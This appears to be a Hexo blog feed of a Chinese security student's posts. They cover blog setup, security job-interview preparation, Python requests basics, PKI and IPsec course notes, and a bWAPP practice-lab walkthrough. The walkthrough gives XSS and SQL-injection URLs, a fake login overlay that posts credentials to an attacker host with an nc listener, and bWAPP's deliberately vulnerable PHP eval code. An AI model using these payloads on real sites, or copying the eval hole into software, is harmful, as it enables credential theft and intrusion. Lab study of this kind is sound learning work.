class="number">100%</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3 id="安装插件"><a href="#安装插件" class="headerlink" title="安装插件"></a>安装插件</h3><figure class="highlight plaintext"><figcaption><span>install hexo-renderer-pug hexo-renderer-stylus --save</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># 字数计数</span><br><span class="line">npm install hexo-wordcount --save</span><br><span class="line"># 本地搜索</span><br><span class="line">npm install hexo-generator-search --save</span><br><span class="line"># 慢加载</span><br><span class="line">npm install hexo-lazyload-image --save</span><br><span class="line"># push到GitHub</span><br><span class="line">npm install hexo-deployer-git --save</span><br><span class="line"># RSS订阅</span><br><span class="line">npm install hexo-generator-feed --save</span><br><span class="line"></span><br><span class="line">#后期安装,图片引用</span><br><span class="line">cnpm install hexo-renderer-marked</span><br></pre></td></tr></table></figure><h3 id="一些小坑"><a href="#一些小坑" class="headerlink" title="一些小坑"></a>一些小坑</h3><ol><li>注意,配置文件冒号后面需要加空格。</li><li>因为之前的githubpro过期了,免费github用户必须选择public仓库才能使用github pages功能,因此选择将仓库Public.</li><li>目前此主题只支持UA跟踪ID,查了一下,Google将于2023年7月下架,所以先不用了。</li></ol><p>还有一些问题,记录在README上了。</p><p><a href="https://github.com/h4m5t/h4m5t.github.io/blob/master/README.md">https://github.com/h4m5t/h4m5t.github.io/blob/master/README.md</a></p><h3 id="修改Profile-README"><a href="#修改Profile-README" class="headerlink" title="修改Profile README"></a>修改Profile README</h3><p>顺便修改了一下github主页的readme,可以选不同颜色主题。</p><p>tokyonight</p><p><a href="https://github.com/h4m5t/github-readme-stats"><img src="https://github-readme-stats.vercel.app/api?username=h4m5t&theme=tokyonight&hide=contribs&show_icons=true" alt="h4m5t's GitHub stats"></a></p><p>Vue</p><p><a href="https://github.com/h4m5t/github-readme-stats"><img src="https://github-readme-stats.vercel.app/api/top-langs/?username=h4m5t&theme=vue&hide=html" alt="Top Langs"></a></p><p>参考下面的repo.</p><a href="https://github.com/anuraghazra/github-readme-stats"> <img align="center" src="https://github-readme-stats.vercel.app/api/pin/?username=anuraghazra&repo=github-readme-stats&theme=buefy" /></a><a href="https://github.com/anuraghazra/anuraghazra.github.io"> <img align="center" src="https://github-readme-stats.vercel.app/api/pin/?username=anuraghazra&repo=anuraghazra.github.io&theme=buefy" /></a><p>可以合并到表格,更整齐。</p><table><thead><tr><th><a href="https://github.com/h4m5t/github-readme-stats"><img align="center" src="https://github-readme-stats.vercel.app/api?username=h4m5t&show_icons=true&theme=vue&hide=contribs&hide_border=true" alt="h4m5t's github stats" /></a></th><th><a href="https://github.com/h4m5t/github-readme-stats"><img align="center" src="https://github-readme-stats.vercel.app/api/top-langs/?username=h4m5t&layout=default&theme=vue&hide=html&hide_border=true" /></a></th></tr></thead></table><p>或者使用自动生成器:</p><p><a href="https://rahuldkjain.github.io/gh-profile-readme-generator/">https://rahuldkjain.github.io/gh-profile-readme-generator/</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
<tag> Github </tag>
</tags>
</entry>
<entry>
<title>图片测试</title>
<link href="/2022/12/01/%E5%9B%BE%E7%89%87%E6%B5%8B%E8%AF%95/"/>
<url>/2022/12/01/%E5%9B%BE%E7%89%87%E6%B5%8B%E8%AF%95/</url>
<content type="html"><![CDATA[<p>ss</p><p>加入图片测试:</p><p><img src="/../img/1.jpg" alt="hh"></p><p>touxiang:</p><p><img src="/../img/tou.jpg" alt="touxiang"></p>]]></content>
</entry>
<entry>
<title>春招</title>
<link href="/2022/08/23/%E6%98%A5%E6%8B%9B/"/>
<url>/2022/08/23/%E6%98%A5%E6%8B%9B/</url>
<content type="html"><![CDATA[<blockquote><p>春招早就告一段落,在这里记录一下。</p></blockquote><h2 id="需要准备的几个方向"><a href="#需要准备的几个方向" class="headerlink" title="需要准备的几个方向"></a>需要准备的几个方向</h2><ol><li>简历 </li><li>自我介绍 </li><li>计算机网络 </li><li>操作系统(操作系统原理,Linux,Windows) </li><li><a href="">数据</a>库 </li><li><a href="">算法</a>(Leetcode) </li><li>编程语言(Python,C++,go等) </li><li><strong>安全知识</strong>(很多很杂,建议根据自己擅长的方向和所投递的岗位进行针对性学习)</li></ol><p> 计算机知识参考CS-NOTES:<a href="http://www.cyc2018.xyz/">http://www.cyc2018.xyz/</a> </p><p> 安全方面的可以去Github,<a href="">知乎</a>,等平台查找。**<a href="">牛客</a>**上也有很多!仔细找。 </p><p> 贴一下我自己找的一些**安全<a href="">面经</a>**:<a href="https://github.com/h4m5t/Sec-Interview">https://github.com/h4m5t/Sec-Interview</a> </p><p> Python面试题:<a href="https://github.com/taizilongxu/interview_python">https://github.com/taizilongxu/interview_python</a> </p><h2 id="安全岗职位要求"><a href="#安全岗职位要求" class="headerlink" title="安全岗职位要求"></a>安全岗职位要求</h2><ul><li>熟悉osquery等开源HIDS工具,阅读过工具部分源码或进行过二次开发 </li><li>有过实战经验(包括src、众测、护网等) </li><li>了解Redis/docker/MySQL/Java框架等常见中间件高危漏洞原理 </li><li>精通 PoC、Exp、规则、指纹等编写的能力 </li><li>熟练掌握Cobalt Strike、Empire、Metasploit等后渗透工具的使用; </li><li>入侵检测 </li><li>熟悉某一安全细分领域,如内网渗透、移动安全、恶意软件分析、CTF竞赛等 </li><li>掌握白帽子攻击流程及常用白帽子工具,熟悉攻击技术,具有渗透常见服务器的经验 </li><li>熟悉热门流行的攻击工具,能够灵活运用各类小工具,并能开发相关的小工具 </li><li>熟悉web、内网、iot方面的渗透流程和攻击技术,有过渗透<a href="">测试</a>、攻击模拟经验 </li><li>实践落地过完整SDL威胁建模方面的项目经验 </li><li>有实际用过<a href="">机器学习</a><a href="">算法</a>解决过实际问题的项目经验 </li><li>有实践过云安全落地解决实际问题的项目经验 </li><li>熟悉windows、Linux系统及常用命令,熟悉WEB服务器常见配置 </li><li>了解Owasp Top10漏洞原理,具备渗透<a href="">测试</a>的实施和交付能力,熟悉渗透<a href="">测试</a>的步骤和方法 </li><li>了解常见企业安全防御技术,有防护绕过实践经验 </li><li>了解基本的Linux、Mysql、Redis、Nginx、DDOS等技术知识 </li><li>参与各类CTF安全竞赛获奖者优先,参与各大SRC、众测平台并排名靠前者优先 </li><li>网络安全法律 </li><li>独立挖掘到 k8s、容器逃逸、虚拟机逃逸相关漏洞的研究者优先; </li><li>熟悉白盒<a href="">审计</a>,能对python、go、php代码进行<a href="">审计</a>; </li><li><a href="">快手</a>招聘要求 </li><li>1、熟练使用SQLmap、Burp Suite、Metasploit等常见安全<a href="">测试</a>工具,了解原理,熟悉代码并且对其进行过二次开发 </li><li>2、在安全社区比较活跃,提交过高质量安全漏洞或者安全分析文章 </li><li>3、开发社区活跃,有开源过安全相关代码 </li><li>4、有互联网安全团队实习经验 </li><li>字节招聘要求 </li><li>linux环境开发能力 </li><li>shell </li><li>有 Windows/Linux 客户端安全攻防的经验,或了解 Android/iOS 移动安全 </li><li>对安全合规,安全管理有了解 </li><li><a href="">数据</a>分析,挖掘,<a href="">机器学习</a> </li><li>React/Vue前端 </li><li>对 Web 安全、服务端安全、客户端安全、移动安全、无线安全、物联网安全等其中一项或几项有深入研究</li></ul><h2 id="面试技巧"><a href="#面试技巧" class="headerlink" title="面试技巧"></a>面试技巧</h2><p> 面试的<strong>节奏最好把握在自己手里</strong>,我们不可能每个方面都会,让面试官随便问的话,很大概率要挂。可以在自我介绍的时候,将你的学习历程讲清楚,让面试官知道你会什么,接触过什么,让他知道你大概会的东西的方向。其次,基础要扎实,漏洞的原理、种类、防御方式、应用等都应该十分熟悉,而且最好准备一些比较深的内容,开始的时候不说,等他问了再说,效果更好。然后,就是项目的经验了,这种东西要你确实做过且了解很深的才行,不然很容易给面试官留下差印象。还有就是HR,技术面你可以和面试官扯蛋、闲聊、开些玩笑也无所谓,但HR最好就不要了,正经点,别什么真话都往外说,别给他理由把你pass了</p><h2 id="我的春招记录"><a href="#我的春招记录" class="headerlink" title="我的春招记录"></a>我的春招记录</h2><p>待更</p>]]></content>
<categories>
<category> 面试 </category>
</categories>
<tags>
<tag> 安全 </tag>
<tag> 面试 </tag>
</tags>
</entry>
<entry>
<title>python安全开发</title>
<link href="/2022/03/06/py%E5%AE%89%E5%85%A8/"/>
<url>/2022/03/06/py%E5%AE%89%E5%85%A8/</url>
<content type="html"><![CDATA[<blockquote><p>半年多没接触编程,手生了。做一些python安全开发的小工具,练手+复习</p></blockquote><h3 id="sqlmap-Tamper"><a href="#sqlmap-Tamper" class="headerlink" title="sqlmap Tamper"></a>sqlmap Tamper</h3><h3 id="Burp插件"><a href="#Burp插件" class="headerlink" title="Burp插件"></a>Burp插件</h3><h3 id="端口扫描探测"><a href="#端口扫描探测" class="headerlink" title="端口扫描探测"></a>端口扫描探测</h3><h3 id="python-web安全"><a href="#python-web安全" class="headerlink" title="python web安全"></a>python web安全</h3><p>1.获取http状态码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">"https://baidu.com"</span></span><br><span class="line">r=requests.get(url)</span><br><span class="line"><span class="built_in">print</span>(r)</span><br></pre></td></tr></table></figure><p>2.get请求</p><p>无参数</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">"https://baidu.com"</span></span><br><span class="line">r=requests.get(url=url)</span><br><span class="line"><span class="built_in">print</span>(r.url)</span><br><span class="line"><span class="built_in">print</span>(r.headers)</span><br><span class="line"><span class="built_in">print</span>(r.status_code)</span><br></pre></td></tr></table></figure><p>带参数请求</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">requests.get(url,params=) <span class="comment">#字典</span></span><br></pre></td></tr></table></figure><p>3.POST请求</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">requests.post(url,data=)</span><br></pre></td></tr></table></figure><p>4.headers自定义请求头</p><p>5.响应头和请求头</p><p><code>print(r.headers)</code></p><p><code>print(r.request.headers)</code></p>]]></content>
<categories>
<category> 安全 </category>
</categories>
</entry>
<entry>
<title>html5新安全</title>
<link href="/2022/02/27/html/"/>
<url>/2022/02/27/html/</url>
<content type="html"><![CDATA[]]></content>
<categories>
<category> 安全 </category>
</categories>
</entry>
<entry>
<title>香农信息论</title>
<link href="/2022/02/26/xinxi/"/>
<url>/2022/02/26/xinxi/</url>
<content type="html"><![CDATA[]]></content>
<categories>
<category> 密码学 </category>
</categories>
</entry>
<entry>
<title>bWAPP靶场记录</title>
<link href="/2022/02/18/bwapp/"/>
<url>/2022/02/18/bwapp/</url>
<content type="html"><![CDATA[<blockquote><p>bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下</p></blockquote><p>主要内容有:一个很综合的靶场,不错!</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections</span><br><span class="line">Blind SQL and Blind OS Command injection</span><br><span class="line">Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)</span><br><span class="line">Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)</span><br><span class="line">Cross-Site Request Forgery (CSRF)</span><br><span class="line">AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)</span><br><span class="line">Malicious, unrestricted file uploads and backdoor files</span><br><span class="line">Authentication, authorization and session management issues</span><br><span class="line">Arbitrary file access and directory traversals</span><br><span class="line">Local and remote file inclusions (LFI/RFI)</span><br><span class="line">Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...</span><br><span class="line">HTTP parameter pollution and HTTP response splitting</span><br><span class="line">Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion</span><br><span class="line">Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations</span><br><span class="line">HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues</span><br><span class="line">Unvalidated redirects and forwards, and cookie poisoning</span><br><span class="line">Cookie poisoning and insecure cryptographic storage</span><br><span class="line">Server Side Request Forgery (SSRF)</span><br><span class="line">XML External Entity attacks (XXE)</span><br><span class="line">And much much much more…</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/02/20/D7wbMz1lakejums.png" alt="image-20220220202650607"></p><h2 id="A1-Injection"><a href="#A1-Injection" class="headerlink" title="A1 Injection"></a>A1 Injection</h2><p><strong>HTML Injection - Reflected (GET)</strong></p><p>get型的html注入</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/htmli_get.php?firstname=%3Ch1%3Etest%3Ch1%3E&lastname=%3Ch1%3Etest%3Ch1%3E&form=submit">http://127.0.0.1/bWAPP/bWAPP/htmli_get.php?firstname=%3Ch1%3Etest%3Ch1%3E&lastname=%3Ch1%3Etest%3Ch1%3E&form=submit</a></p><p>也可以使用xss</p><p><strong>HTML Injection - Reflected (POST)</strong></p><p>通过hackbar提交POST请求即可</p><p><img src="https://s2.loli.net/2022/02/20/2LMTuO1Etgp8J4I.png" alt="image-20220220204407419"></p><p><strong>HTML Injection - Reflected (URL)</strong></p><p>尝试XSS</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E">http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E</a></p><p>bp抓包之后对编码进行修改</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">GET /bWAPP/bWAPP/htmli_current_url.php/?a=<script>alert(/xss/)</script> HTTP/1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=r4h29vbhsl8upskjm0bs4ve575; security_level=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-User: ?1</span><br></pre></td></tr></table></figure><p>原理如此,但这个只能在IE浏览器才能成功。</p><p><strong>HTML Injection - Stored (Blog)</strong></p><p>可以XSS</p><p>看了网上以为老外写的exp</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;"</span>></span>Please login with valid credentials:<span class="tag"><<span class="name">br</span>></span><span class="tag"><<span class="name">form</span> <span class="attr">name</span>=<span class="string">"login"</span> <span class="attr">action</span>=<span class="string">"http://AttackerIP/login.htm"</span>></span><span class="tag"><<span class="name">table</span>></span><span class="tag"><<span class="name">tr</span>></span><span class="tag"><<span class="name">td</span>></span>Username:<span class="tag"></<span class="name">td</span>></span><span class="tag"><<span class="name">td</span>></span><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"username"</span>/></span><span class="tag"></<span class="name">td</span>></span><span class="tag"></<span class="name">tr</span>></span><span class="tag"><<span class="name">tr</span>></span><span class="tag"><<span class="name">td</span>></span>Password:<span class="tag"></<span class="name">td</span>></span><span class="tag"><<span class="name">td</span>></span><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"password"</span>/></span><span class="tag"></<span class="name">td</span>></span><span class="tag"></<span class="name">tr</span>></span><span class="tag"><<span class="name">tr</span>></span><span class="tag"><<span class="name">td</span> <span class="attr">colspan</span>=<span class="string">2</span> <span class="attr">align</span>=<span class="string">center</span>></span><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Login"</span>/></span><span class="tag"></<span class="name">td</span>></span><span class="tag"></<span class="name">tr</span>></span><span class="tag"></<span class="name">table</span>></span><span class="tag"></<span class="name">form</span>></span><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure><p>攻击机:nc -l 80</p><p><strong>iFrame Injection</strong></p><p><a href="http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250">http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250</a></p><p><strong>OS Command Injection</strong></p><p>命令注入,跟DVWA的很类似</p><p><img src="https://s2.loli.net/2022/02/20/UKktMiq6WuCHn7R.png" alt="image-20220220212958793"></p><p><strong>OS Command Injection - Blind</strong></p><p>跟SQL盲注类似,根据时间判断命令是否执行成功</p><p><strong>PHP Code Injection</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">"message"</span>]))</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> <span class="comment">// If the security level is not MEDIUM or HIGH</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_COOKIE</span>[<span class="string">"security_level"</span>] != <span class="string">"1"</span> && <span class="variable">$_COOKIE</span>[<span class="string">"security_level"</span>] != <span class="string">"2"</span>)</span><br><span class="line"> {</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"> <p><i><span class="meta"><?php</span> @<span class="keyword">eval</span> (<span class="string">"echo "</span> . <span class="variable">$_REQUEST</span>[<span class="string">"message"</span>] . <span class="string">";"</span>);<span class="meta">?></span></i></p></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br></pre></td></tr></table></figure><p><a href="http://127.0.0.1/bWAPP/bWAPP/phpi.php/?message=phpinfo()">http://127.0.0.1/bWAPP/bWAPP/phpi.php/?message=phpinfo()</a></p><p>有点像get型传参的注入</p><p><img src="https://s2.loli.net/2022/02/20/pXSNjQOwt8syzPq.png" alt="image-20220220213536683"></p><p><strong>Server-Side Includes (SSI) Injection</strong></p><p>这里执行XSS没有问题,但是对服务端包含还不够熟悉。用了一下老外的exp也没成功</p><p>接下来就是SQL注入类型的了。</p><p><strong>SQL Injection (GET/Search)</strong></p><img src="https://s2.loli.net/2022/02/20/u8NYSzxcdGIKl4H.png" alt="image-20220220214631158" style="zoom:67%;" /><p><a href="http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%25%27%20order%20by%207%20--+&action=search">http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%%27%20order%20by%207%20--+&action=search</a></p><p>order试出列</p><p>数据库名和用户名</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%27%20union%20select%201,database(),user(),4,5,6,7%20--+&action=search">http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%27%20union%20select%201,database(),user(),4,5,6,7%20--+&action=search</a></p><p><strong>SQL Injection (AJAX/JSON/jQuery)</strong></p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>Attacks on the RSA Cryptosystem</title>
<link href="/2022/02/14/rsa/"/>
<url>/2022/02/14/rsa/</url>
<content type="html"><![CDATA[<blockquote><p>《Twenty Years of Attacks on the RSA Cryptosystem》阅读笔记</p></blockquote>]]></content>
<categories>
<category> 密码学 </category>
</categories>
</entry>
<entry>
<title>network-security学习笔记</title>
<link href="/2022/02/04/network/"/>
<url>/2022/02/04/network/</url>
<content type="html"><![CDATA[<h3 id="第一章:网络安全综述"><a href="#第一章:网络安全综述" class="headerlink" title="第一章:网络安全综述"></a>第一章:网络安全综述</h3><p>网络安全是建立在密码学以及协议设<br>计的基础上的</p><p>网络安全的主要任务:</p><ul><li>保障网络与系统 安全、可靠、高效、可控、持续地运行和被访问。</li><li>保障信息 机密、完整、不可否认、可认证地传输和使用。</li></ul><p>ISO-OSI模型。</p><p>TCP/IP模型</p><p><img src="https://s2.loli.net/2022/02/04/9dAn3ixbW4Q8vOh.png" alt="image-20210913194224992"></p><p><strong>X.800</strong></p><p>用一种或多种安全机制来实现安全服务,安全服务<br>致力于抵御安全攻击。</p><p>主动攻击:</p><ul><li>伪装</li><li>重放</li><li>篡改</li><li>拒绝服务</li></ul><p>被动攻击:</p><ul><li>窃听</li><li>流量分析</li></ul><p><img src="https://s2.loli.net/2022/02/04/3naZDNqwlg9tevy.png" alt="image-20210913194643371"></p><p><img src="https://s2.loli.net/2022/02/04/XHVR9Zpfa8zgFCj.png" alt="image-20210913194651098"></p><h3 id="第二章:公钥基础设施PKI"><a href="#第二章:公钥基础设施PKI" class="headerlink" title="第二章:公钥基础设施PKI"></a>第二章:公钥基础设施PKI</h3><p>1.公钥基础设施:PKI是一个用非对称密码算法原理和技术来实现并提供安全服务的具有通用性的<strong>安全基础设施</strong>。是一种遵循标准的利用公钥加密技术为电子商务的开展提供安全基础平台的<strong>技术和规范</strong>。能够为所有网络应用提供采用加密和数字签名等密码服务所需要的<strong>密钥和证书管理</strong>。</p><p>2.功能(为什么需要PKI)</p><p>对可信第三方的需要(CA)<br>电子政务、电子商务对信息传输的安全需求,统一标准<br>在收发双方建立信任关系,提供身份认证、数字签名、加密等安全服务<br>收发双方不需要事先共享密钥,通过公钥加密传输会话密钥</p><p>3.证书的基本结构</p><img src="https://s2.loli.net/2022/02/04/hNSCUm76I4MxOGL.png" alt="image-20210913200921714" style="zoom:50%;" /><p>4.组成</p><img src="https://s2.loli.net/2022/02/04/hNSCUm76I4MxOGL.png" alt="image-20210913201019930" style="zoom:50%;" /><p>5.密钥备份和恢复系统:</p><ul><li>签名密钥对:签名私钥相当于日常生活中的印章效力,为保证其唯一性、抗<br>否认性,<strong>签名私钥不作备份</strong>。签名密钥的生命期较长。</li><li>加密密钥对:加密密钥通常用于分发会话密钥,为防止密钥丢失时无法解密<br>数据,<strong>解密密钥应进行备份</strong>。这种密钥应频繁更换。</li></ul><p>6.交叉认证:</p><p>多个PKI独立地运行,相互之间应建立信任关系</p><p>对等CA互相签发</p><p>7.PKI服务</p><ul><li>认证</li><li>完整性</li><li>保密性</li><li>不可否认性服务</li><li>公证服务</li></ul><p>8.常用的密码技术</p><p><img src="https://s2.loli.net/2022/02/04/zK7PNpDgb36ZJiy.png" alt="image-20210913200849982"></p><p>机密性:数据加密(数字信封)</p><p>信息发送端用接收端的公钥,将一个通信密钥(即对称密钥)给予加密,生成一个数字信封。接收端用自己的私钥打开数字信封,获取该对称密钥SK,用它来解读收到的信息。</p><p>身份认证:数字签名</p><p>对待发的数据首先生成一段数据摘要,再采用己方私钥基于非对称加密算法进行加密,结果附在原文上一起发送,接受方对其进行验证,判断原文真伪。这种数字签名适用于对大文件的处理,对于那些小文件的数据签名,则不预先做数据摘要,而直接将原文进行非对称加密处理。</p><p><img src="https://s2.loli.net/2022/02/04/8ME9BfWIjDJYOec.png" alt="image-20210913203234717"></p><p>完整性:数字签名+MAC</p><p>不可否认性:数字签名+时间戳</p><p>由于非对称密码的运算复杂、加/解密速度慢,因此信息的加密采用对称密码<br>算法,其会话密钥的分发采用非对称密码算法,即采用收方的公钥对会话密<br>钥进行加密。</p><p>报文检验码(消息认证码MAC)</p><p>9.PKI功能操作</p><p><img src="https://s2.loli.net/2022/02/04/qRikpxLtbmevSK4.png" alt="image-20210913203710477"></p><p>初始化</p><ul><li>终端实体注册</li><li>密钥对产生(用户产生,CA产生,其他可信第三方产生)</li><li>证书创建</li><li>证书分发</li><li>密钥备份</li></ul><p>10.生命周期</p><ul><li>证书获取</li><li>证书验证——确定一个证书的有效性</li><li>密钥恢复——对终端用户因为某种原因而丢失的<strong>加密密钥</strong>可以恢复,从CA或信任第三方处恢复</li><li>密钥更新——当一个合法的密钥对将过期时,进行新的公/私钥的自动产生和相应证书的颁发</li></ul><img src="https://s2.loli.net/2022/02/04/jKIqVLdBDf9mErN.png" alt="image-20210913205553051" style="zoom:80%;" /><p>11.信任CA结构</p><ul><li>层次模型</li><li>分布式信任结构模型</li><li>桥式结构</li><li>混合结构</li></ul><p>层次模型:</p><p><img src="https://s2.loli.net/2022/02/04/bMj6Ot8GCWT1H4x.png" alt="image-20210913205835921"></p><p>分布式模型:</p><p><img src="https://s2.loli.net/2022/02/04/cbVHQY2hKjUoXiq.png" alt="image-20210913210007417"></p><p>12.证书链</p><p><img src="https://s2.loli.net/2022/02/04/yCGjYx7pRMuhIqd.png" alt="image-20210913205905995"></p><p><img src="https://s2.loli.net/2022/02/04/pvflzX9OgAWV6xQ.png" alt="image-20210913210043066"></p><p>13.X.509</p><p>为了解决X.500目录中的身份鉴别和访问控制问题而设计的。同时本身也采用目录的形式进行管理和访问。</p><p>14.主要内容</p><p><img src="https://s2.loli.net/2022/02/04/DLVSdZAvPF1WGuw.png" alt="image-20210913210603513"></p><p>15.CA</p><p>PKI核心实体认证机构CA,为各个实体颁发电子证书,对实体身份信息和相应公钥数据进行数字签名,用以捆绑该实体的公钥和身份,以证明各实体在网上身份的真实性;并负责在交易中检验和管理证书.</p><p>功能</p><ul><li>证书申请</li><li>证书审批</li><li>证书颁发</li><li>证书撤销</li><li>证书更新</li><li>证书废止列表管理</li><li>证书的归档</li><li>CA自身的维护管理</li><li>CA自身密钥管理</li></ul><h3 id="第三章:IPSec-AH和ESP"><a href="#第三章:IPSec-AH和ESP" class="headerlink" title="第三章:IPSec-AH和ESP"></a>第三章:IPSec-AH和ESP</h3><p>1.IPv4和IPv6</p><img src="https://s2.loli.net/2022/02/04/o1dMQ9qNkyS3hbL.png" alt="image-20210914224817924" style="zoom: 67%;" /><p>2.安全组合SA</p><p>为使通信双方的认证/加密算法及其参数、密钥的一致,相互间建立的联系被称为安全组合或安全关联(Security Association)</p><p>SA是单向的,在双向通信时要建立两个SA</p><p>安全关联数据库(SAD)</p><p>安全策略数据库(SPD)</p><p>SA由一个三元组唯一地标识,该三元组为安全参数索引SPI、一个<br>用于输出处理的目的IP地址和协议(如AH或ESP)</p><p>3.认证头标AH</p><ul><li>AH协议提供无连接的完整性、数据源认证和抗重放保护服务</li><li>不提供保密性服务</li><li>AH使用消息认证码(MAC)对IP进行认证</li></ul><p><img src="https://s2.loli.net/2022/02/04/BWHeyNro9dh3YxD.png" alt="image-20210915000523376"></p><p>序列号的使用:防止重放。</p><p>认证头标:完整性校验。</p><p>AH外出处理和进入处理</p><p>4.封装安全载荷ESP</p><ul><li>ESP提供数据保密、抗重播服务、无连接完整<br>性(可选)</li><li>ESP大都采用对称密码体制加密数据</li><li>ESP使用消息认证码(MAC)提供认证服务</li></ul><p><img src="https://s2.loli.net/2022/02/04/dKOposuE4BMUtGT.png" alt="image-20210915001552673"></p><p>填充的目的:</p><ul><li>加密算法要求明文为某个数目字节的整数倍;</li><li>32位对齐;</li><li>隐藏实际载荷长度,提供流量保密性</li></ul><p>ESP外出处理,进入处理。</p><p>5.传输模式和隧道模式</p><p><img src="https://s2.loli.net/2022/02/04/ykhDB23V76WCEoF.png" alt="image-20210915003245428"></p><p>6.IPsec和NAT</p><p>IPsec优点:</p><ul><li>对边界所有流量强制实现安全性,内部网络无需关注开销;</li><li>对上层协议、终端用户透明、</li><li>构建安全的虚拟专用网</li></ul><p>具有AH头标或ESP头标的的IP分组不能穿越NAT和NATPT</p><p>7.IPSec隧道模式的应用-VPN</p><p>VPN 的种类、功能</p><p>8.IPsec的实现</p><p>IPSec VPN 的处理流程</p><h3 id="第四章:IPSec-IKE"><a href="#第四章:IPSec-IKE" class="headerlink" 